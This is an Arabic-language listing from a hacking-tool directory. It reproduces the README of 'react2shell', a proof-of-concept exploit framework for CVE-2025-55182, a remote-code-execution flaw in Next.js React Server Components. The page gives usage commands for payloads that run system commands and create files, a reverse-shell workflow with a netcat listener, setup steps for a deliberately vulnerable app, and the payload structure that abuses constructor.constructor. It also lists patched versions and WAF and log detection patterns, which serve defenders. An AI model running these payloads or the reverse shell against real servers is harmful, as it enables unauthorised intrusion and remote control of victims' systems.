Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
react2shell — إطار عمل كامل لاستغلال الثغرة الأمنية CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/zr0n/react2shell
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubzr0n/react2shell

react2shell

إطار عمل كامل لاستغلال الثغرة الأمنية CVE-2025-55182

عرض المستودع
1053منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

React2Shell - إثبات مفهوم استغلال CVE-2025-55182

Security Platform License

أداة استغلال (إثبات مفهوم) لثغرة CVE-2025-55182، وهي ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد داخل تطبيقات Next.js التي تستخدم React Server Components.

⚠️ إخلاء المسؤولية

هذه الأداة مخصصة للاختبارات الأمنية التعليمية والمصرح بها فقط.

  • ❌ لا تستخدمها ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها
  • ❌ الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • ✅ استخدمها فقط في بيئات خاضعة للتحكم لأغراض التعلم واختبارات الاختراق المصرح بها
  • ✅ المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة

📋 تفاصيل الثغرة

  • معرف CVE: CVE-2025-55182
  • نوع الثغرة: تنفيذ التعليمات البرمجية عن بُعد في React Server Components
  • الإصدارات المتأثرة:
    • Next.js: ≥14.3.0-canary.77، جميع إصدارات 15.x و16.x التي تستخدم App Router
    • React: 19.0، 19.1.0، 19.1.1، 19.2.0
  • الإصدارات المُصحَّحة:
    • Next.js: 16.0.7، 15.5.7، 15.4.8، 15.3.6، 15.2.6، 15.1.9، 15.0.5
  • React: 19.0.1، 19.1.2، 19.2.1
  • درجة CVSS: حرجة
  • ناقل الهجوم: عبر الشبكة، يتطلب طلب POST مُصممًا خصيصًا
  • 🎯 الميزات

    • ✅ دعم عبر المنصات (Windows و Linux)
    • ✅ أنواع حمولات متعددة
    • ✅ إمكانية إنشاء صدفة عكسية (Reverse shell)
    • ✅ حمولات إثبات مرئية (calc، notepad)
    • ✅ عمليات على نظام الملفات
    • ✅ جمع معلومات النظام

    🔧 التثبيت

    root@kitploit:~
    # Clone or download this repository
    git clone https://github.com/zr0n/react2shell
    cd react2shell
    
    # Install dependencies
    npm install form-data
    

    💻 الاستخدام

    الصيغة الأساسية

    root@kitploit:~
    node react2shell.js <target_url> <payload_type> [options]
    

    الحمولات المتاحة

    PayloadDescriptionExample
    basicإثبات رياضي للمفهوم (7*7+1=50)node react2shell.js http://target:3000 basic
    whoamiعرض مستخدم النظام الحاليnode react2shell.js http://target:3000 whoami
    dirعرض محتويات الدليل الحاليnode react2shell.js http://target:3000 dir
    systeminfoعرض معلومات نظام التشغيلnode react2shell.js http://target:3000 systeminfo
    fileإنشاء ملف إثبات EXPLOITED.txtnode react2shell.js http://target:3000 file
    calcتشغيل الآلة الحاسبة (إثبات مرئي على Windows)node react2shell.js http://target:3000 calc
    notepadتشغيل المفكرة (إثبات مرئي على Windows)node react2shell.js http://target:3000 notepad
    shellصدفة عكسية (كشف تلقائي بين Windows/Linux)node react2shell.js http://target:3000 shell 10.10.10.5 4444

    أمثلة

    1. إثبات المفهوم الأساسي

    root@kitploit:~
    node react2shell.js http://localhost:3000 basic
    # Check server console for output: EXPLOITED: 50
    

    2. استطلاع النظام

    root@kitploit:~
    # Get current user
    node react2shell.js http://localhost:3000 whoami
    
    # List files
    node react2shell.js http://localhost:3000 dir
    
    # System information
    node react2shell.js http://localhost:3000 systeminfo
    

    3. الإثبات المرئي (ويندوز)

    root@kitploit:~
    # Launch calculator
    node react2shell.js http://localhost:3000 calc
    
    # Launch notepad
    node react2shell.js http://localhost:3000 notepad
    

    4. إثبات إنشاء ملف

    root@kitploit:~
    node react2shell.js http://localhost:3000 file
    # Check server directory for EXPLOITED.txt
    

    5. الصدفة العكسية

    root@kitploit:~
    # Terminal 1: Start listener
    nc -lvnp 4444
    
    # Terminal 2: Execute exploit
    node react2shell.js http://localhost:3000 shell <YOUR_IP> 4444
    
    # Works on both Windows (PowerShell) and Linux (Bash)
    

    🏗️ إعداد بيئة قابلة للاستغلال

    المتطلبات الأساسية

    • Node.js 18+
    • npm أو yarn

    إنشاء تطبيق Next.js قابل للاستغلال

    root@kitploit:~
    # Create project directory
    mkdir vulnerable-nextjs-app
    cd vulnerable-nextjs-app
    
    # Initialize Next.js with vulnerable version
    npx create-next-app@latest . --ts --app --no-eslint --tailwind
    
    # Downgrade to vulnerable version
    npm install [email protected]
    
    # Install dependencies
    npm install
    

    تطبيق مصغّر قابل للاستغلال (app/page.tsx)

    root@kitploit:~
    export default function Home() {
      return (
        <div className="p-8">
          <h1 className="text-4xl font-bold">Vulnerable Next.js App</h1>
          <p className="mt-4">This app is vulnerable to CVE-2025-55182</p>
        </div>
      );
    }
    

    تشغيل الخادم

    root@kitploit:~
    npm run dev
    # Server runs on http://localhost:3000
    

    🔍 كيفية العمل

    يعتمد هذا الاستغلال على ثغرة إلغاء تسلسل (Deserialization) في React Server Components:

    1. بناء الحمولة: إنشاء كائن مُسلسَل خبيث مع تلويث النموذج الأولي (Prototype Pollution)
    2. الوصول إلى مُنشئ الدوال (Function Constructor): استغلال constructor.constructor للوصول إلى مُنشئ Function
    3. حقن التعليمات البرمجية: حقن كود JavaScript عشوائي عبر حقل _prefix
    4. التنفيذ: يقوم الخادم بإلغاء تسلسل الحمولة وتنفيذ الكود المحقون

    التفاصيل التقنية

    root@kitploit:~
    // Simplified vulnerability chain
    {
      _formData: {
        get: '$3:constructor:constructor' // Access Function constructor
      },
      _prefix: 'YOUR_CODE_HERE//' // Injected code
    }
    

    🛡️ الإجراءات الوقائية

    لمالكي التطبيقات

    1. التحديث فورًا:

      root@kitploit:~
      npm update next@latest
      npm update react@latest react-dom@latest
      
    2. التحقق من الإصدارات المُصحَّحة:

      root@kitploit:~
      npm list next react
      
    3. الإصدارات المطلوبة:

      • Next.js: ≥16.0.7 أو ≥15.5.7
      • React: ≥19.2.1 أو ≥19.1.2

    لفرق الأمان

    • افحص البنية التحتية بحثًا عن إصدارات Next.js القابلة للاستغلال
    • طبّق قواعد جدار حماية تطبيقات الويب (WAF) لكشف حمولات RSC الخبيثة
    • راقب طلبات POST المشبوهة التي تحمل ترويسات next-action
    • راجع سجلات الخادم بحثًا عن أنماط تنفيذ كود غير متوقعة

    📊 الكشف

    قواعد WAF

    ابحث عن طلبات POST التي تحتوي على:

    • الترويسة: next-action
    • نوع المحتوى: multipart/form-data
    • نص يتضمن: constructor, _prefix, _formData

    أنماط السجلات

    root@kitploit:~
    POST / with next-action header
    Suspicious FormData keys: 0, 1, 2, 3, 4
    Response: 200 (successful exploitation) or 500 (failed)
    

    📚 المراجع

    • CVE-2025-55182 - NVD
    • نشرات أمان Next.js
    • تحديثات أمان React
    • حقن الكود - OWASP

    🤝 المساهمة

    هذه أداة تعليمية. المساهمات التي تعمل على تحسين:

    • إمكانيات الكشف
    • التوثيق
    • استراتيجيات الدفاع
    • المحتوى التعليمي

    مرحب بها. لا تقدم مساهمات تعزز قدرات الهجوم.

    📜 الترخيص

    للاستخدام التعليمي فقط - دون أي ضمان

    👤 المؤلف

    Luiz Fernando Ziron أُنشئت لأغراض التعليم والتوعية في مجال الأمن السيبراني.

    ⚖️ إشعار قانوني

    باستخدامك لهذه الأداة، فإنك توافق على:

    • استخدامها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
    • تحمل المسؤولية الكاملة عن أفعالك
    • عدم تحميل المؤلف المسؤولية عن أي إساءة استخدام أو ضرر
    • الامتثال لجميع القوانين واللوائح المعمول بها

    الوصول غير المصرح به إلى أنظمة الكمبيوتر جريمة في معظم الدول.


    ابقَ آمنًا، وحافظ على الأخلاقيات، والتزم بالقانون. 🔒

    تنزيل الأداة